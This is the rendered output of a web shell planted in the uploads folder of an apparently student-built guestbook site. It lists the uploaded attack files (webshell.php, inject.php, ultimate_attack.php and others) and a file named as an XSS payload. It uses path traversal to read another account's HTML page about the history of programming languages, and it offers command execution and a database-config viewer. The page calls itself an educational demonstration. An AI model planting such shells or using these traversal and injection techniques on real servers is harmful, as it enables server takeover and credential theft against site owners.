🐚 WEB SHELL ACTIVATED

πŸ“ File Browser

Current directory: /home/klas4s23/domains/585455.klas4s23.mid-ica.nl/public_html/Gastenboek/uploads

πŸ“„ ' onerror='alert(`Gehacked door Jasper!`);window.location.replace(`..`)'.png [view]
πŸ“ ..
πŸ“„ 003b15869ae62d2ceeee451a5f652dd6.png [view]
πŸ“„ 0tk5j14v024b1.jpg [view]
πŸ“„ 300px-Cursed_Cat.jpg [view]
πŸ“„ 32640-afbeelding-1__ScaleMaxWidthWzYwMF0_CompressedW10.jpg [view]
πŸ“„ Bill-Gates-Paul-Allen-2013.jpg [view]
πŸ“„ CV Jasper Kramp.png [view]
πŸ“„ Cat profile.png [view]
πŸ“„ Fronalpstock_big.jpg [view]
πŸ“„ Krik en las.jpg [view]
πŸ“„ Krik.jpg [view]
πŸ“„ Pino-dood-03.jpg [view]
πŸ“„ Shellz.php [view]
πŸ“„ Ted_Kaczynski_2_(cropped).jpg [view]
πŸ“„ Tux.svg.png [view]
πŸ“„ Z.png [view]
πŸ“„ android.jpg [view]
πŸ“„ apple.php [view]
πŸ“„ cianancatfish.jpg [view]
πŸ“„ downloads (1).jpeg [view]
πŸ“„ downloads.jpeg [view]
πŸ“„ epresso.jpg [view]
πŸ“„ fake_photo.png [view]
πŸ“„ hand.jpg [view]
πŸ“„ https___dynaimage.cdn.cnn.com_cnn_x_156,y_210,w_1209,h_1612,c_crop_https2F2F5bae1c384db3d70020c01c40%2FfireflyWolfy.jpg [view]
πŸ“„ image.png [view]
πŸ“„ images.jpeg [view]
πŸ“„ info.php [view]
πŸ“„ inject.php [view]
πŸ“„ instant_redirect.jpg [view]
πŸ“„ japper.jpg [view]
πŸ“„ koekiemonster-3.jpg [view]
πŸ“„ logo.png [view]
πŸ“„ muis.jpg [view]
πŸ“„ people-call-woman-ugly-responds-with-more-selfies-melissa-blake-1-5d75f249a418b__700.jpg [view]
πŸ“„ picobellobv.jpeg [view]
πŸ“„ redirect.php [view]
πŸ“„ rupsje-nooitgenoeg-knuffel-pluche-42-cm-500x500.jpg [view]
πŸ“„ sdfsa.png [view]
πŸ“„ sneaky.svg [view]
πŸ“„ taylor.webp [view]
πŸ“„ test.html [view]
πŸ“„ testpreg.php [view]
πŸ“„ testpreg1.php [view]
πŸ“„ testtest.php.JPG [view]
πŸ“„ ultimate_attack.gif [view]
πŸ“„ ultimate_attack.php [view]
πŸ“„ ultimate_attack.svg [view]
πŸ“„ wallpaper.jpg [view]
πŸ“„ webshell.php [view]

πŸ“„ Viewing: ../../../../587649.klas4s23.mid-ica.nl/public_html/Technowire/programming.html

<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
    <link rel="stylesheet" href="styles.css">
</head>

<body>
    <div class="container1">
        <div class="navigator1">
            <nav>
                <ul>
                    <li><a href="index.html">Home</a></li>
                    <li><a href="programming.html">Programming</a></li>
                    <li><a href="silicone.html">Silicone Valley</a></li>
                    <li><a href="itfame.html">IT Hall of fame</a></li>
                </ul>
            </nav>
        </div>
        <div class="inleiding">
            <p> Programming is a crucial skill in the modern world, and there are several programming languages
                available to address the diversity of tasks and applications. These languages ​​can be
                divided into several main categories based on their complexity, level of abstraction and
                scope. In this introduction we will provide an overview of these main categories, where we
                will provide examples to clarify the concepts.</p>

            <p>Machine code is the most basic form of programming. It consists of binary instructions that
                can be understood directly by a computer processor. Each command represents one
                specific action, such as adding two numbers or storing data in memory. A
                sample machine code would look like this: 10110010 00110100.</p>

            <p>Assembly languages, also called assembly, are a layer above machine code. They use symbolic
                names and abbreviations for instructions and memory locations to facilitate programming.</p>

            <p>Higher level programming languages, such as Python, Java and C++, provide abstraction on top of the
                machine code and
                assembly language. They use readable text and understandable syntax to perform complex tasks.
            </p>

            <p>Fourth generation languages ​​(4GLs) are designed to address specific problems at a high level.
                They are often focused on database management, reporting or GUI development. Example 4GLs are SQL for
                database queries and Visual Basic for application development.</p>

            <p>Object-oriented languages, such as C#, Java, and Python, are based on the concept of objects and
                classes. They promote reusability and modularity of code. For example, in Java you can create a
                class to represent a car and then create multiple car objects.

                These main categories form the basis for understanding the various programming languages ​​used in the
                world of software development are used. Each of these categories has its own strengths
                and applications, and programmers often choose the right language based on their specific requirements
                projects. In the next parts of this document we will delve deeper into each category and some
                discuss examples of languages ​​in that category.</p>
        </div>
        <div class="header2">
            <h1>Development of programming languages </h1>
        </div>
        <div class="footer1"></div>
        <div class="logo1">
            <img src="images/logo.png">
        </div>
        <div class="tijdlijn">
            <div class="titel1">
                <h1>Timeline</h1>
            </div>
            <div class="event">
                <img src="images/fortan-logo.png" alt="Fortran Logo">
                <h3>Fortran</h3>
                <p><strong>Year of Publication:</strong> 1957</p>
                <p><strong>Developer(s):</strong> IBM, John Backus, and his team</p>
                <p><strong>Specific Features:</strong> Early high-level language, widely used in scientific and
                    engineering applications.</p>
                <p><strong>Learn More:</strong> <a href="https://www.fortran.com">Official Website</a></p>
            </div>

            <div class="event">
                <img src="images/cobol-logo.png" alt="COBOL Logo">
                <h3>COBOL</h3>
                <p><strong>Year of Publication:</strong> 1959</p>
                <p><strong>Developer(s):</strong> A committee of experts led by Grace Hopper</p>
                <p><strong>Specific Features:</strong> Designed for business data processing, supports English-like
                    syntax.</p>
                <p><strong>Learn More:</strong> <a href="https://www.cobol.com">Official Website</a></p>
            </div>

            <div class="event">
                <img src="images/c-logo.png" alt="C Logo">
                <h3>C Programming</h3>
                <p><strong>Year of Publication:</strong> 1972</p>
                <p><strong>Developer(s):</strong> Dennis Ritchie</p>
                <p><strong>Specific Features:</strong> Procedural, low-level memory manipulation, widely used for system
                    and application programming.</p>
                <p><strong>Learn More:</strong> <a href="https://www.learn-c.org/">Learn C</a></p>
            </div>

            <div class="event">
                <img src="images/cpp-logo.png" alt="C++ Logo">
                <h3>C++ Programming</h3>
                <p><strong>Year of Publication:</strong> 1985</p>
                <p><strong>Developer(s):</strong> Bjarne Stroustrup</p>
                <p><strong>Specific Features:</strong> Extension of C, object-oriented, supports classes and
                    polymorphism.</p>
                <p><strong>Learn More:</strong> <a href="https://www.cplusplus.com/">C++ Reference</a></p>
            </div>

            <div class="event">
                <img src="images/python-logo.jpg" alt="Python Logo">
                <h3>Python</h3>
                <p><strong>Year of Publication:</strong> 1991</p>
                <p><strong>Developer(s):</strong> Guido van Rossum</p>
                <p><strong>Specific Features:</strong> High-level, dynamic typing, easy-to-read syntax.</p>
                <p><strong>Learn More:</strong> <a href="https://www.python.org">Official Website</a></p>
            </div>

            <div class="event">
                <img src="images/java-logo.png" alt="Java Logo">
                <h3>Java</h3>
                <p><strong>Year of Publication:</strong> 1995</p>
                <p><strong>Developer(s):</strong> James Gosling, Mike Sheridan, Patrick Naughton</p>
                <p><strong>Specific Features:</strong> Object-oriented, platform-independent, strong type system.</p>
                <p><strong>Learn More:</strong> <a href="https://www.oracle.com/java">Official Website</a></p>
            </div>

            <div class="event">
                <img src="images/csharp-logo.png" alt="C# Logo">
                <h3>C# Programming</h3>
                <p><strong>Year of Publication:</strong> 2000</p>
                <p><strong>Developer(s):</strong> Microsoft Corporation</p>
                <p><strong>Specific Features:</strong> Object-oriented, designed for .NET Framework, used for Windows
                    application development.</p>
                <p><strong>Learn More:</strong> <a href="https://learn.microsoft.com/en-us/dotnet/csharp/">Learn C#</a>
                </p>
            </div>
        </div>
    </div>
</body>

</html>
<style>
    @import url('https://fonts.cdnfonts.com/css/agency-fb');
</style>

🎯 Available Actions

Command Execution:

Quick Commands:

πŸ“‹ List files | πŸ‘€ Show user | πŸ“ Show directory | πŸ”„ Show processes | πŸ” Show users

File Operations:

⬆️ Parent directory | 🏠 Root directory | πŸ” View DB config
⚠️ Educational Warning: This demonstrates a web shell vulnerability. In a real attack, this could allow complete server compromise!